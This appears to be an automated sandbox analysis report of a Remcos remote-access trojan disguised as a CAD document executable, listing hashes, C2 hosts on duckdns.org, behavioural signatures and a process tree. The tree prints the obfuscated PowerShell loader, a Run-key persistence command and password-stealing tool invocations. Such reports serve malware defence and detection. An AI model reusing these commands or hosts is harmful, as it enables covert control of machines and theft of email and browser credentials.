Overview

overview

10

Static

static

1

CAD_DETAIL...21.exe

windows7-x64

8

CAD_DETAIL...21.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    299s
  • max time network
    290s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-01-2025 13:38

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    CAD_DETAILS_ Copies_6761fa19c0f9d_293874738_IMG__REF2632737463773364_221.exe

  • Size

    643KB

  • MD5

    5cba30723bcacc171aa6417869f5981c

  • SHA1

    a8abaf40ae64d44f9055d4dd3df2f91ac393ecc1

  • SHA256

    d20dae11fd9de533d5ba84666b26dbf233161d991643d2de08fd043699cddbcc

  • SHA512

    6ebb1d4f664933e6f063759c2a615feb72ef250b5a0ec0f3f9775868bacc661931ee64e9ae943db6f58a43b08eac7350a1f511ebf97620356bc504e81d78c431

  • SSDEEP

    12288:llLIJdKsaouLbYCjUnmITaCQwN44mlIc4G66Jg1KCe4sEftmU3BgKiC:lSJaouPYComqa6fcx66Jg16EfthGC

Score
10/10
remcosspredecollectiondiscoveryexecutionpersistencerat

Malware Config

Extracted

Family

remcos

Botnet

SPREDE

C2

oaziamaka111.duckdns.org:4689

oaziamaka111.duckdns.org:4688

oaziamaka222.duckdns.org:4689

oaziamaka222.duckdns.org:4688
Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    true

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    aleopty.dat

  • keylog_flag

    false

  • keylog_path

    %AppData%

  • mouse_option

    false

  • mutex

    deokloksgb-NAYJ41

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Remcos family
    remcos
  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
    collection
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Blocklisted process makes network request 4 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 15 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\CAD_DETAILS_ Copies_6761fa19c0f9d_293874738_IMG__REF2632737463773364_221.exe
    "C:\Users\Admin\AppData\Local\Temp\CAD_DETAILS_ Copies_6761fa19c0f9d_293874738_IMG__REF2632737463773364_221.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1320
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden "$Topskuddene=gc -Raw 'C:\Users\Admin\AppData\Local\Temp\terrorproof\smuttersens\Panics.End';$Flygtningebaggrund=$Topskuddene.SubString(72585,3);.$Flygtningebaggrund($Topskuddene)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4336
      • C:\Windows\SysWOW64\msiexec.exe
        "C:\Windows\SysWOW64\msiexec.exe"
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:3440
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Kldevare" /t REG_EXPAND_SZ /d "%Dishonorer% -windowstyle 1 $Provianterendes=(Get-Item 'HKCU:\Software\Decade\').GetValue('Uprightman');%Dishonorer% ($Provianterendes)"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4232
          • C:\Windows\SysWOW64\reg.exe
            REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Kldevare" /t REG_EXPAND_SZ /d "%Dishonorer% -windowstyle 1 $Provianterendes=(Get-Item 'HKCU:\Software\Decade\').GetValue('Uprightman');%Dishonorer% ($Provianterendes)"
            5⤵
            • Adds Run key to start application
            • System Location Discovery: System Language Discovery
            • Modifies registry key
            PID:1824
        • C:\Windows\SysWOW64\msiexec.exe
          C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\ifvhvecntnemqmmaiymxaht"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:3464
        • C:\Windows\SysWOW64\msiexec.exe
          C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\thbaowvphvwrtsieriyylmgaum"
          4⤵
          • Accesses Microsoft Outlook accounts
          • System Location Discovery: System Language Discovery
          PID:4440
        • C:\Windows\SysWOW64\msiexec.exe
          C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\dbglopgjdeoedywqjtlaozardsfet"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3368

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uefaj252.4wv.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\ifvhvecntnemqmmaiymxaht
    Filesize

    4KB

    MD5

    17eece3240d08aa4811cf1007cfe2585

    SHA1

    6c10329f61455d1c96e041b6f89ee6260af3bd0f

    SHA256

    7cc0db44c7b23e4894fe11f0d8d84b2a82ad667eb1e3504192f3ba729f9a7903

    SHA512

    a7de8d6322410ec89f76c70a7159645e8913774f38b84aafeeeb9f90dc3b9aa74a0a280d0bb6674790c04a8ff2d059327f02ebfda6c4486778d53b7fc6da6370

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\terrorproof\smuttersens\Mythopoet151.Gum
    Filesize

    308KB

    MD5

    95456efa53e67771a7a366a1729330a5

    SHA1

    7c6753470c3f2a1919af9608040e31404eb15955

    SHA256

    4e5986d80aa60a80b07731921a0dbb905f663de679dbc4bfe897ad27fe04555d

    SHA512

    36bd759c9e49100db6739293ccbb1508b260b5866813d085403e489ec40e86019cfccdebb6a134afdd3fe42410c53a57865ef904eefd7cd33b9944f7cb4f3d13

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\terrorproof\smuttersens\Panics.End
    Filesize

    70KB

    MD5

    fa9db15fb8638e539838260c0f09078b

    SHA1

    adcb4f9c75b0120d8f0369edd71d75397bd9507f

    SHA256

    648a811ffe8215aa2f12cdfcbed2ca0efa438a628a0164e592508e56538bbd4b

    SHA512

    24412e43da7b725aad0bf64347ac718573bd3c95409cb9a1c6f90f9abb474fae46583588b7eb9943d5be829b6466007fb28cefbad59b819d88064b30205b1153

    Download Submit

  • memory/3368-87-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

    Download

  • memory/3368-81-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

    Download

  • memory/3368-83-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

    Download

  • memory/3440-95-0x000000001EB10000-0x000000001EB29000-memory.dmp

    Filesize

    100KB

    Download

  • memory/3440-89-0x0000000002170000-0x0000000003239000-memory.dmp

    Filesize

    16.8MB

    Download

  • memory/3440-96-0x000000001EB10000-0x000000001EB29000-memory.dmp

    Filesize

    100KB

    Download

  • memory/3440-71-0x0000000000F10000-0x0000000002164000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/3440-68-0x0000000002170000-0x0000000003239000-memory.dmp

    Filesize

    16.8MB

    Download

  • memory/3440-92-0x000000001EB10000-0x000000001EB29000-memory.dmp

    Filesize

    100KB

    Download

  • memory/3464-77-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

    Download

  • memory/3464-79-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

    Download

  • memory/3464-82-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

    Download

  • memory/3464-74-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

    Download

  • memory/4336-27-0x0000000005FD0000-0x0000000005FF2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4336-63-0x0000000008580000-0x0000000009649000-memory.dmp

    Filesize

    16.8MB

    Download

  • memory/4336-31-0x0000000073DE0000-0x0000000074590000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4336-33-0x0000000070270000-0x00000000702BC000-memory.dmp

    Filesize

    304KB

    Download

  • memory/4336-43-0x0000000006EC0000-0x0000000006EDE000-memory.dmp

    Filesize

    120KB

    Download

  • memory/4336-44-0x0000000006EF0000-0x0000000006F93000-memory.dmp

    Filesize

    652KB

    Download

  • memory/4336-45-0x0000000073DE0000-0x0000000074590000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4336-46-0x0000000006FF0000-0x0000000006FFA000-memory.dmp

    Filesize

    40KB

    Download

  • memory/4336-47-0x0000000073DE0000-0x0000000074590000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4336-48-0x0000000007150000-0x0000000007161000-memory.dmp

    Filesize

    68KB

    Download

  • memory/4336-49-0x0000000007190000-0x000000000719E000-memory.dmp

    Filesize

    56KB

    Download

  • memory/4336-50-0x00000000071A0000-0x00000000071B4000-memory.dmp

    Filesize

    80KB

    Download

  • memory/4336-51-0x0000000007200000-0x000000000721A000-memory.dmp

    Filesize

    104KB

    Download

  • memory/4336-52-0x00000000071D0000-0x00000000071D8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/4336-53-0x0000000007200000-0x000000000722A000-memory.dmp

    Filesize

    168KB

    Download

  • memory/4336-54-0x0000000007230000-0x0000000007254000-memory.dmp

    Filesize

    144KB

    Download

  • memory/4336-55-0x0000000073DEE000-0x0000000073DEF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4336-56-0x0000000073DE0000-0x0000000074590000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4336-57-0x0000000073DE0000-0x0000000074590000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4336-59-0x0000000073DE0000-0x0000000074590000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4336-60-0x0000000073DE0000-0x0000000074590000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4336-30-0x0000000007F00000-0x000000000857A000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/4336-62-0x0000000073DE0000-0x0000000074590000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4336-32-0x0000000006E80000-0x0000000006EB2000-memory.dmp

    Filesize

    200KB

    Download

  • memory/4336-64-0x0000000073DE0000-0x0000000074590000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4336-65-0x0000000073DE0000-0x0000000074590000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4336-66-0x0000000073DE0000-0x0000000074590000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4336-67-0x0000000073DE0000-0x0000000074590000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4336-28-0x00000000072D0000-0x0000000007874000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/4336-5-0x0000000073DEE000-0x0000000073DEF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4336-26-0x0000000005F80000-0x0000000005F9A000-memory.dmp

    Filesize

    104KB

    Download

  • memory/4336-6-0x0000000000CE0000-0x0000000000D16000-memory.dmp

    Filesize

    216KB

    Download

  • memory/4336-25-0x0000000006C40000-0x0000000006CD6000-memory.dmp

    Filesize

    600KB

    Download

  • memory/4336-23-0x0000000005A80000-0x0000000005A9E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/4336-24-0x0000000005AC0000-0x0000000005B0C000-memory.dmp

    Filesize

    304KB

    Download

  • memory/4336-22-0x00000000054D0000-0x0000000005824000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/4336-8-0x0000000004D50000-0x0000000005378000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/4336-11-0x0000000005380000-0x00000000053E6000-memory.dmp

    Filesize

    408KB

    Download

  • memory/4336-7-0x0000000073DE0000-0x0000000074590000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4336-12-0x0000000005460000-0x00000000054C6000-memory.dmp

    Filesize

    408KB

    Download

  • memory/4336-10-0x0000000004AB0000-0x0000000004AD2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4336-9-0x0000000073DE0000-0x0000000074590000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4440-76-0x0000000000400000-0x0000000000462000-memory.dmp

    Filesize

    392KB

    Download

  • memory/4440-80-0x0000000000400000-0x0000000000462000-memory.dmp

    Filesize

    392KB

    Download

  • memory/4440-75-0x0000000000400000-0x0000000000462000-memory.dmp

    Filesize

    392KB

    Download